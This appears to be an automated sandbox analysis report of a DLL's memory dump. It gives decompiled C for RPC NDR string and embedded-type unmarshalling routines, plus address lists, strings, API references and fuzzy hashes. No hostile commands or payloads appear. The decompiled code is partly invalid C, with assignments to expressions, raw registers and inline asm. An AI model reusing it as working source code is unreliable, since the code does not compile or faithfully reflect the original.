                                                                                                C-Code - Quality: 46%
                                                                                                			E6EDA1E40(signed int _a4, WCHAR* _a8, signed char* _a12) {
                                                                                                				void* _t60;
                                                                                                				void* _t61;
                                                                                                
                                                                                                				0x6eda0000("(pStubMsg == ^%p, pszMessage == ^%p, pFormat == ^%p)\n", _a4, _a8, _a12);
                                                                                                				_t61 = _t60 + 0x10;
                                                                                                				if(( *_a12 & 0x000000ff) != 0x22 && ( *_a12 & 0x000000ff) != 0x25) {
                                                                                                					0x6eda0000("Unhandled string type: %#x\n",  *_a12 & 0x000000ff);
                                                                                                					_t61 = _t61 + 8;
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                				}
                                                                                                				if(( *_a12 & 0x000000ff) != 0x22) {
                                                                                                					E6EDAD120(0x25, _a4, _a8, _a12);
                                                                                                					E6EDAD360(0x25, _a4, _a8, _a12, 1);
                                                                                                				} else {
                                                                                                					E6EDAD120(0x22, _a4, _a8, _a12);
                                                                                                					E6EDAD360(0x22, _a4, _a8, _a12, 1);
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA1EA6
                                                                                                Strings
                                                                                                • (pStubMsg == ^%p, pszMessage == ^%p, pFormat == ^%p), xrefs: 6EDA1E4F
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA1E94
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pszMessage == ^%p, pFormat == ^%p)$Unhandled string type: %#x
                                                                                                • API String ID: 3997070919-1435394972
                                                                                                • Opcode ID: 2abb68813644048d06b95a8fb4a38e19bdf564522ab94cd0e3dba40e4be6b5d2
                                                                                                • Instruction ID: a003769449b1b4a4a48cb4b158d73fcd1affc139907e83cbd11e28b028774883
                                                                                                • Opcode Fuzzy Hash: 2abb68813644048d06b95a8fb4a38e19bdf564522ab94cd0e3dba40e4be6b5d2
                                                                                                • Instruction Fuzzy Hash: 842153B6604145ABD704DFDCDC51EBB376EAB89704F048418FF198B2C6D631EA508BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 46%
                                                                                                			E6EDA57A0(int _a4, WCHAR* _a8, signed char* _a12) {
                                                                                                				void* _t59;
                                                                                                				void* _t60;
                                                                                                
                                                                                                				0x6eda0000("(pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p)\n", _a4, _a8, _a12);
                                                                                                				_t60 = _t59 + 0x10;
                                                                                                				if(( *_a12 & 0x000000ff) != 0x22 && ( *_a12 & 0x000000ff) != 0x25) {
                                                                                                					0x6eda0000("Unhandled string type: %#x\n",  *_a12 & 0x000000ff);
                                                                                                					_t60 = _t60 + 8;
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                				}
                                                                                                				if(( *_a12 & 0x000000ff) != 0x22) {
                                                                                                					E6EDACC40(0x25, _a4, _a8, _a12);
                                                                                                					return E6EDACE70(0x25, _a4, _a8, _a12, 1);
                                                                                                				} else {
                                                                                                					E6EDACC40(0x22, _a4, _a8, _a12);
                                                                                                					return E6EDACE70(0x22, _a4, _a8, _a12, 1);
                                                                                                				}
                                                                                                			}






                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA5806
                                                                                                Strings
                                                                                                • (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p), xrefs: 6EDA57AF
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA57F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p)$Unhandled string type: %#x
                                                                                                • API String ID: 3997070919-3061728
                                                                                                • Opcode ID: 70d6fe2d53c98d0e99498f11185db3fb0379b456d224e25794ba7e7c0eb1abbc
                                                                                                • Instruction ID: 091e8e6e8a434da9d81348379e28df56016ac42c28464b219001e7e40a2067dc
                                                                                                • Opcode Fuzzy Hash: 70d6fe2d53c98d0e99498f11185db3fb0379b456d224e25794ba7e7c0eb1abbc
                                                                                                • Instruction Fuzzy Hash: 3E214FB6600145ABE704DF9CDC91EBB376AAB89700F148418FA198F282D631EA508BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 21%
                                                                                                			E6EDA99D4() {
                                                                                                				void* _t246;
                                                                                                				void* _t248;
                                                                                                				void* _t250;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					 *(_t246 + 0xc) =  *(_t246 + 0xc) + (( *(_t246 + 0x10))[1] & 0x000000ff);
                                                                                                					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
                                                                                                					 *(_t246 - 8) =  &(( *(_t246 + 0x10))[ *( *(_t246 + 0x10))]);
                                                                                                					 *((intOrPtr*)(_t246 - 0x18)) = E6EDAE3A0( *((intOrPtr*)(_t246 + 8)),  *(_t246 - 8));
                                                                                                					0x6eda0000("embedded complex (size=%d) => %p\n",  *((intOrPtr*)(_t246 - 0x18)),  *(_t246 + 0xc));
                                                                                                					_t250 = _t248 + 0x14;
                                                                                                					if(( *(_t246 + 0x18) & 0x000000ff) != 0) {
                                                                                                						E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_t246 - 0x14)) =  *((intOrPtr*)(0x6edbb418 + ( *( *(_t246 - 8)) & 0x7f) * 4));
                                                                                                					if( *((intOrPtr*)(_t246 - 0x14)) == 0) {
                                                                                                						0x6eda0000("no unmarshaller for embedded type %02x\n",  *( *(_t246 - 8)) & 0x000000ff);
                                                                                                						_t250 = _t250 + 8;
                                                                                                					} else {
                                                                                                						if(( *( *(_t246 - 8)) & 0x000000ff) != 0x2f) {
                                                                                                							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)), _t246 + 0xc,  *(_t246 - 8), 0);
                                                                                                						} else {
                                                                                                							 *((intOrPtr*)(_t246 - 0x14))( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc),  *(_t246 - 8), 0);
                                                                                                						}
                                                                                                					}
                                                                                                					 *(_t246 + 0xc) =  *(_t246 + 0xc) +  *((intOrPtr*)(_t246 - 0x18));
                                                                                                					 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[2]);
                                                                                                					L1:
                                                                                                					while(( *( *(_t246 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                                						 *(_t246 - 0xc) =  *( *(_t246 + 0x10)) & 0x000000ff;
                                                                                                						 *(_t246 - 0xc) =  *(_t246 - 0xc) - 1;
                                                                                                						if( *(_t246 - 0xc) > 0xb8) {
                                                                                                							L46:
                                                                                                							0x6eda0000("unhandled format %d\n",  *( *(_t246 + 0x10)) & 0x000000ff);
                                                                                                							_t250 = _t250 + 8;
                                                                                                							L47:
                                                                                                							 *(_t246 + 0x10) =  &(( *(_t246 + 0x10))[1]);
                                                                                                							continue;
                                                                                                						}
                                                                                                						L3:
                                                                                                						_t23 =  *(_t246 - 0xc) + 0x6eda9b24; // 0xcccccc0f
                                                                                                						switch( *((intOrPtr*)(( *_t23 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
                                                                                                							case 0:
                                                                                                								L4:
                                                                                                								E6EDAAFA0( *((intOrPtr*)(_t246 + 8)),  *(_t246 + 0xc), 1);
                                                                                                								_push( *(_t246 + 0xc));
                                                                                                								_push( *( *(_t246 + 0xc)) & 0x0000ffff);
                                                                                                								_push("byte=%d => %p\n");
                                                                                                								0x6eda0000();
                                                                                                								_t250 = _t250 + 0x18;
                                                                                                								 *(_t246 + 0xc) =  &(( *(_t246 + 0xc))[0]);
                                                                                                								goto L47;
                                                                                                							case 1:
                                                                                                								L5:
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								_push( *(__ebp + 0xc));
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                                								_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                                								_push("short=%d => %p\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 0xc;
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								__ecx =  *(__ebp + 0xc) + 2;
                                                                                                								 *(__ebp + 0xc) = __ecx;
                                                                                                								goto L47;
                                                                                                							case 2:
                                                                                                								L9:
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								_push( *(__ebp + 0xc));
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								__eax =  *( *(__ebp + 0xc));
                                                                                                								_push( *( *(__ebp + 0xc)));
                                                                                                								_push("long=%d => %p\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 0xc;
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								__ecx =  *(__ebp + 0xc) + 4;
                                                                                                								 *(__ebp + 0xc) = __ecx;
                                                                                                								goto L47;
                                                                                                							case 3:
                                                                                                								L12:
                                                                                                								__eax =  *(__ebp + 0xc);
                                                                                                								__ecx =  *(__ebp + 8);
                                                                                                								__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								_push( *(__ebp + 0xc));
                                                                                                								__eax =  *(__ebp + 0xc);
                                                                                                								asm("cvtss2sd xmm0, [eax]");
                                                                                                								__esp = __esp - 8;
                                                                                                								asm("movsd [esp], xmm0");
                                                                                                								_push("float=%f => %p\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 0x10;
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								__ecx =  *(__ebp + 0xc) + 4;
                                                                                                								 *(__ebp + 0xc) = __ecx;
                                                                                                								goto L47;
                                                                                                							case 4:
                                                                                                								L13:
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								_push( *(__ebp + 0xc));
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								__eax =  *(__edx + 4);
                                                                                                								_push(__eax);
                                                                                                								__ecx =  *__edx;
                                                                                                								_push(__ecx);
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 8;
                                                                                                								_push(__eax);
                                                                                                								_push("longlong=%s => %p\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 0xc;
                                                                                                								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                								goto L47;
                                                                                                							case 5:
                                                                                                								L14:
                                                                                                								__eax =  *(__ebp + 0xc);
                                                                                                								__ecx =  *(__ebp + 8);
                                                                                                								__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								_push( *(__ebp + 0xc));
                                                                                                								__eax =  *(__ebp + 0xc);
                                                                                                								__esp = __esp - 8;
                                                                                                								asm("movsd xmm0, [eax]");
                                                                                                								asm("movsd [esp], xmm0");
                                                                                                								_push("double=%f => %p\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 0x10;
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								__ecx =  *(__ebp + 0xc) + 8;
                                                                                                								 *(__ebp + 0xc) = __ecx;
                                                                                                								goto L47;
                                                                                                							case 6:
                                                                                                								L6:
                                                                                                								__edx = __ebp - 4;
                                                                                                								 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
                                                                                                								__ecx =  *(__ebp - 4) & 0x0000ffff;
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
                                                                                                								__eax =  *(__ebp + 0xc);
                                                                                                								_push( *(__ebp + 0xc));
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								__edx =  *( *(__ebp + 0xc));
                                                                                                								_push( *( *(__ebp + 0xc)));
                                                                                                								_push("enum16=%d => %p\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 0xc;
                                                                                                								__eax =  *(__ebp + 0xc);
                                                                                                								if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                                									_push(0x6f5);
                                                                                                									__imp__RpcRaiseException();
                                                                                                								}
                                                                                                								L8:
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								__ecx =  *(__ebp + 0xc) + 4;
                                                                                                								 *(__ebp + 0xc) = __ecx;
                                                                                                								goto L47;
                                                                                                							case 7:
                                                                                                								L15:
                                                                                                								 *(__ebp - 0x1c) = 0;
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								_push( *(__ebp + 0xc));
                                                                                                								_push("pointer => %p\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 8;
                                                                                                								__eax =  *(__ebp + 0x10);
                                                                                                								__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                								if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                                								}
                                                                                                								__eax =  *(__ebp + 0x14);
                                                                                                								__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                								if(__ecx != 0x11) {
                                                                                                									 *(__ebp + 8) =  *(__ebp + 8) + 4;
                                                                                                									__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
                                                                                                								}
                                                                                                								__eax =  *(__ebp + 8);
                                                                                                								__ecx =  *(__eax + 4);
                                                                                                								 *(__ebp - 0x20) =  *(__eax + 4);
                                                                                                								__edx =  *(__ebp + 8);
                                                                                                								if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                                									__ecx =  *(__ebp + 0x14);
                                                                                                									__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                										 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                									}
                                                                                                								} else {
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__edx =  *(__ecx + 0x34);
                                                                                                									 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									 *( *(__ebp + 8) + 0x34) = 0;
                                                                                                									 *(__ebp - 0x1c) = 1;
                                                                                                								}
                                                                                                								__ecx =  *(__ebp + 0x18) & 0x000000ff;
                                                                                                								__edx =  *(__ebp + 0x14);
                                                                                                								__eax =  *(__ebp + 0xc);
                                                                                                								__ecx =  *( *(__ebp + 0xc));
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								__eax =  *(__ebp - 0x20);
                                                                                                								__ecx =  *(__ebp + 8);
                                                                                                								__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
                                                                                                								if( *(__ebp - 0x1c) == 0) {
                                                                                                									L29:
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                                										 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
                                                                                                									} else {
                                                                                                										__ecx =  *(__ebp + 0x14);
                                                                                                										__ecx =  *(__ebp + 0x14) + 4;
                                                                                                										 *(__ebp + 0x14) = __ecx;
                                                                                                									}
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									goto L47;
                                                                                                								} else {
                                                                                                									do {
                                                                                                										L24:
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										__eax =  *(__edx + 0x14);
                                                                                                										_push( *(__edx + 0x14));
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *( *(__ebp + 8));
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                                										_push( *(__eax + 4) -  *(__edx + 8));
                                                                                                										_push("buffer=%d/%d\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 0xc;
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										__eax =  *( *(__ebp + 8));
                                                                                                										__ecx =  *(__eax + 8);
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__edx =  *( *(__ebp + 8));
                                                                                                											__eax =  *(__edx + 8);
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											 *(__edx + 4) =  *(__edx + 4) - __eax;
                                                                                                											_push( *(__edx + 4) - __eax);
                                                                                                											_push("buffer overflow %d bytes\n");
                                                                                                											0x6eda0000();
                                                                                                											__esp = __esp + 8;
                                                                                                										}
                                                                                                										__edx = 0;
                                                                                                									} while (0 != 0);
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__edx =  *(__ecx + 4);
                                                                                                									 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__ebp - 0x20);
                                                                                                									 *( *(__ebp + 8) + 4) = __ecx;
                                                                                                									__edx =  *(__ebp + 0x14);
                                                                                                									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                									}
                                                                                                									goto L29;
                                                                                                								}
                                                                                                							case 8:
                                                                                                								L33:
                                                                                                								__ecx =  *(__ebp - 0x10);
                                                                                                								__edx = __ebp + 0xc;
                                                                                                								__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
                                                                                                								goto L47;
                                                                                                							case 9:
                                                                                                								L34:
                                                                                                								__eax =  *(__ebp - 0x10);
                                                                                                								__ecx = __ebp + 0xc;
                                                                                                								__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
                                                                                                								goto L47;
                                                                                                							case 0xa:
                                                                                                								L35:
                                                                                                								__edx =  *(__ebp - 0x10);
                                                                                                								__ebp + 0xc = E6EDA7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
                                                                                                								goto L47;
                                                                                                							case 0xb:
                                                                                                								L36:
                                                                                                								__ecx =  *(__ebp + 0x10);
                                                                                                								 *( *(__ebp + 0x10)) & 0x000000ff = ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                								 *(__ebp + 0xc) = E6EDB0770( *(__ebp + 0xc), 0, ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c);
                                                                                                								__ecx =  *(__ebp + 0x10);
                                                                                                								__edx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                								__eax =  *(__ebp + 0xc);
                                                                                                								__ecx =  *(__ebp + 0xc) + ( *( *(__ebp + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                								 *(__ebp + 0xc) = __ecx;
                                                                                                								goto L47;
                                                                                                							case 0xc:
                                                                                                								goto L0;
                                                                                                							case 0xd:
                                                                                                								L45:
                                                                                                								goto L47;
                                                                                                							case 0xe:
                                                                                                								L10:
                                                                                                								__edx = __ebp - 0x24;
                                                                                                								 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 0x24, 4);
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								__edx =  *(__ebp - 0x24);
                                                                                                								 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
                                                                                                								__eax =  *(__ebp + 0xc);
                                                                                                								_push( *(__ebp + 0xc));
                                                                                                								__ecx =  *(__ebp + 0xc);
                                                                                                								__edx =  *__ecx;
                                                                                                								_push( *__ecx);
                                                                                                								_push("int3264=%ld => %p\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 0xc;
                                                                                                								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                								goto L47;
                                                                                                							case 0xf:
                                                                                                								L11:
                                                                                                								__ecx = __ebp - 0x28;
                                                                                                								__edx =  *(__ebp + 8);
                                                                                                								E6EDAAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
                                                                                                								__ecx =  *(__ebp - 0x28);
                                                                                                								 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
                                                                                                								__edx =  *(__ebp + 0xc);
                                                                                                								_push( *(__ebp + 0xc));
                                                                                                								__eax =  *(__ebp + 0xc);
                                                                                                								__ecx =  *( *(__ebp + 0xc));
                                                                                                								_push(__ecx);
                                                                                                								_push("uint3264=%ld => %p\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 0xc;
                                                                                                								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                								goto L47;
                                                                                                							case 0x10:
                                                                                                								goto L46;
                                                                                                						}
                                                                                                					}
                                                                                                					return  *(_t246 + 0xc);
                                                                                                				}
                                                                                                			}






                                                                                                0x6eda9863
                                                                                                0x6eda9869
                                                                                                0x6eda9871
                                                                                                0x6eda9876
                                                                                                0x6eda9841
                                                                                                0x6eda9841
                                                                                                0x6eda9844
                                                                                                0x6eda9847
                                                                                                0x6eda984a
                                                                                                0x6eda984d
                                                                                                0x6eda9850
                                                                                                0x6eda9857
                                                                                                0x6eda9857
                                                                                                0x6eda9879
                                                                                                0x6eda987e
                                                                                                0x6eda9882
                                                                                                0x6eda9885
                                                                                                0x6eda9888
                                                                                                0x6eda988c
                                                                                                0x6eda9890
                                                                                                0x6eda9894
                                                                                                0x6eda98a0
                                                                                                0x6eda9935
                                                                                                0x6eda9935
                                                                                                0x6eda9938
                                                                                                0x6eda993e
                                                                                                0x6eda994e
                                                                                                0x6eda9951
                                                                                                0x6eda9940
                                                                                                0x6eda9940
                                                                                                0x6eda9943
                                                                                                0x6eda9946
                                                                                                0x6eda9946
                                                                                                0x6eda9957
                                                                                                0x6eda995a
                                                                                                0x00000000
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a9
                                                                                                0x6eda98ac
                                                                                                0x6eda98ad
                                                                                                0x6eda98b0
                                                                                                0x6eda98b2
                                                                                                0x6eda98b8
                                                                                                0x6eda98bb
                                                                                                0x6eda98bc
                                                                                                0x6eda98c1
                                                                                                0x6eda98c6
                                                                                                0x6eda98c9
                                                                                                0x6eda98cc
                                                                                                0x6eda98ce
                                                                                                0x6eda98d1
                                                                                                0x6eda98d4
                                                                                                0x6eda98d7
                                                                                                0x6eda98dd
                                                                                                0x6eda98df
                                                                                                0x6eda98e2
                                                                                                0x6eda98e4
                                                                                                0x6eda98e7
                                                                                                0x6eda98ea
                                                                                                0x6eda98ed
                                                                                                0x6eda98f3
                                                                                                0x6eda98f5
                                                                                                0x6eda98f6
                                                                                                0x6eda98fb
                                                                                                0x6eda9900
                                                                                                0x6eda9900
                                                                                                0x6eda9903
                                                                                                0x6eda9903
                                                                                                0x6eda9907
                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9990
                                                                                                0x6eda9992
                                                                                                0x6eda999a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99ad
                                                                                                0x6eda99b7
                                                                                                0x6eda99bf
                                                                                                0x6eda99c2
                                                                                                0x6eda99c5
                                                                                                0x6eda99c8
                                                                                                0x6eda99cc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9ab5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda96a8
                                                                                                0x6eda96aa
                                                                                                0x6eda96b2
                                                                                                0x6eda96ba
                                                                                                0x6eda96bd
                                                                                                0x6eda96c0
                                                                                                0x6eda96c2
                                                                                                0x6eda96c5
                                                                                                0x6eda96c6
                                                                                                0x6eda96c9
                                                                                                0x6eda96cb
                                                                                                0x6eda96cc
                                                                                                0x6eda96d1
                                                                                                0x6eda96d6
                                                                                                0x6eda96dc
                                                                                                0x6eda96df
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda96e7
                                                                                                0x6eda96e9
                                                                                                0x6eda96ed
                                                                                                0x6eda96f9
                                                                                                0x6eda96fc
                                                                                                0x6eda96ff
                                                                                                0x6eda9701
                                                                                                0x6eda9704
                                                                                                0x6eda9705
                                                                                                0x6eda9708
                                                                                                0x6eda970a
                                                                                                0x6eda970b
                                                                                                0x6eda9710
                                                                                                0x6eda9715
                                                                                                0x6eda971b
                                                                                                0x6eda971e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95a4
                                                                                                0x6eda9adf
                                                                                                0x6eda9adf

                                                                                                APIs
                                                                                                Strings
                                                                                                • no unmarshaller for embedded type %02x, xrefs: 6EDA9A91
                                                                                                • embedded complex (size=%d) => %p, xrefs: 6EDA9A19
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: embedded complex (size=%d) => %p$no unmarshaller for embedded type %02x
                                                                                                • API String ID: 2102423945-1287812044
                                                                                                • Opcode ID: c77135f87002b37bba7b2044ac27a6ca613594af9411f3590cf9dc31f9660cdf
                                                                                                • Instruction ID: 11bf148d141c6979c0e5e7a10b461716e9387dfcb04069f163b5a6640ceaa6cc
